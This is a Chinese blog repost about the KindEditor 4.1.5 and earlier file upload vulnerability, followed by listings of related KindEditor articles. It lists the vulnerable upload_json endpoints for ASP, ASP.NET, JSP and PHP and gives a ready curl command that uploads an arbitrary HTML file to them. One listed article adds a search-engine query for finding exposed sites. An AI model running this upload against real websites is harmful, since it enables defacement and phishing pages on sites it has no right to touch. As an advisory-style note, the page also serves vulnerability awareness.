kindeditor<=4.1.5 文件上传漏洞利用

最新推荐文章于 2024-06-17 15:10:13 发布
最新推荐文章于 2024-06-17 15:10:13 发布
阅读量258 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iAmSoScArEd/p/10575936.html
版权

kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

  

  漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器

  漏洞影响:上传任意. txt 和. html 文件

  漏洞存在动态脚本语言: php/asp/jsp/asp.net

  漏洞存在的证明文件:upload_json.*  具体路径如下:

  /kindeditor/asp/upload_json.asp

  /kindeditor/asp.net/upload_json.ashx

  /kindeditor/jsp/upload_json.jsp

  /kindeditor/php/upload_json.php

利用方式:

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

 

在返回中得到上传后的路径,然后访问

 

转载于:https://www.cnblogs.com/iAmSoScArEd/p/10575936.html

weixin_34320159
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kindeditor-4.1.5.rar
05-28
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。 KindEditor 使用 JavaScript ...
springmvc+kindeditor文件上传实例详解
08-27
在本文中,我们将深入探讨如何使用Spring MVC框架与KindEditor集成实现文件上传功能。Spring MVC是Java企业级应用中广泛使用的MVC框架,它提供了一种结构化的方式来处理HTTP请求和响应,而KindEditor则是一个功能...
kindeditor<=4.1.5文件上传漏洞
weixin_30252155的博客
12-24 321
最近发现很多网页篡改与暗链都是利用kindeditor编辑器,于是搜了一下kindeditor漏洞,发现低于4.1.5版本的存在文件上传漏洞,可以上传txt,html后缀的文档,许多恶意的文档貌似都是这样上传上去的。 但是实际测试过程中还未找到可上传html的站点,txt文档倒是可以上传。做个测试记录 google搜素一些存在的站点 inurl:kindeditor 根本脚本语言自定义不...
富文本编辑器 kindeditor 使用整理
json_li的博客
05-19 4437
kindeditor富文本编辑器忘记什么时候添加到项目中了,最近做一个功能需要在原有编辑器上自定义添加一些固定内容,于是对着编辑器文档研究了一番,在这里做一个使用方式整理。
C#结合JS 修改解决 KindEditor 弹出层问题
最新发布
初九之潜龙勿用
06-17 2324
KindEditor 是一款出色的富文本HTML在线编辑器,这里我们讲述在使用中遇到的一个问题,在部署到某些WEB 应用项目中,点击类似弹出层功能时,只显示了遮罩层,而内容层则定位无法正确显示,本文将介绍如何解决该问题。
kindeditor用法简介
努力奋进,勇追不止……
11-05 3747
kindeditor用法简介kindeditor:作为一种文本编辑工具,比较受大家欢迎。和fckeditor差不多,个人感觉这个的皮肤更好看,而且对中文的支持更好,没那么容易出现中文乱码问题。下次记录一下自己的简单用法: 1,首先去官网下载http://www.kindsoft.net/  2,解压之后如图所示:![这里写图片描述](http://img.blog.csdn.net/20151
KindEditor文件上传漏洞(CVE-2018-18950)
m0_65150886的博客
01-03 1906
漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。1.直接删除upload_json.和file_manager_json.即可。​​​​​​​6.访问html文件如下。7.抓包,上传txt文件,获取返回路径。8.访问上传文件,发现成功上传。
学习整理KindEditor常用的使用方法,取值赋值
徊忆羽菲
01-16 1446
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。 KindEditor 使用 JavaScript 编写,可以无缝地与 Java、.NET、PHP、ASP 等程序集成,比较适合在 CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。
在Vue项目使用kindEditor富文本编译器以及上传图片
xiaoHelloWord的博客
04-16 1459
第一步 第二步,建立kindeditor.vue组件 第三步引入 如果需要自定义行距下拉菜单可以直接修改kindeditor-all.js这个。 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:撤销:Ctrl/Command + Z 重做:Ctr
SpringMVC KindEditor在线编辑器之文件上传代码实例
08-25
SpringMVC KindEditor 在线编辑器之文件上传代码实例 SpringMVC KindEditor 在线编辑器是一种流行的在线编辑器,对于文件上传功能的实现非常重要。在本文中,我们将详细介绍如何使用 SpringMVC 框架结合 ...
kindeditor配置和上传文件
08-03
kindeditor极容易在.net里面配置,本方法介绍上传文件盒图片,十分简单,通过测试,假如您觉得好的话,请给五分哦!
kindeditor论坛评论回复插件
04-10
kindeditor是我见过最强大的回复控件,此版本表情被优化过,提供了流氓兔等格式原版没有的表情
Kindeditor
06-25
KindEditor是一套很方便的html编译器插件。KindEditor文件(里面有jsp,asp等不同版本文件夹,可以删掉你不需要的版本),把整个文件夹放到你的web服务器里(放哪都行,但放的位置需要有访问权限,最好建立一个权限为777的public文件夹,把KindEditor文件夹放进去)
kindeditor最新版
04-03
kindeditor最新版,web有名的富编辑器,很好用~
kindeditor jsp示例源码(包含上传文件)
08-16
此示例源码中,服务器端部分可能包含一个Servlet或Controller,用于接收KindEditor上传的文件。文件会被临时保存在服务器的某个目录下,然后返回一个JSON响应。JSP和Servlet之间的交互通常使用HTTP请求,通过POST...
网站安全检测被 提示该网站内容被禁止访问
网站安全专家
05-11 1746
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的网站漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司网站,以及事业单位的网...
KindEditor介绍
janny_flower的博客
08-31 609
        KindEditor是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用KindEditor把传统的多行文本输入框替换为可视化的富文本输入框。使用javascript编写,无缝与java,.net,php,asp等程序集成。         特点:快速,开源,底层,扩展,风格,兼容。  ...
KindEditor上传图片
Strive279的博客
11-10 4050
KindEditor相关介绍以及下载可查看http://blog.csdn.net/mytt_10566/article/details/78062205。本篇主要关于上传图片,结合Spring MVC处理文件上传。 1.初始化编辑器 配置可参照KindEditor文档:http://kindeditor.net/docs/upload.html文档中uploadJson属性配置的是…/kindeditor/jsp/upload_json.jsp,我们可以参照该jsp修改成对应ImageControlle
Python入门自学进阶-Web框架——34、富文本编辑器KindEditor、爬虫初步
kaoa000的专栏——非淡泊无以明志,非宁静无以致远
03-10 1426
KindEditor富文本编辑器使用,爬虫初步
kindeditor 任意文件上传
07-27
对于 KindEditor 的任意文件上传漏洞,可以采取以下步骤进行防护: 1. 更新到最新版本:及时更新 KindEditor 到最新版本,以确保修复了已知的漏洞。 2. 文件类型白名单:在服务器端进行文件类型白名单限制,只允许...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值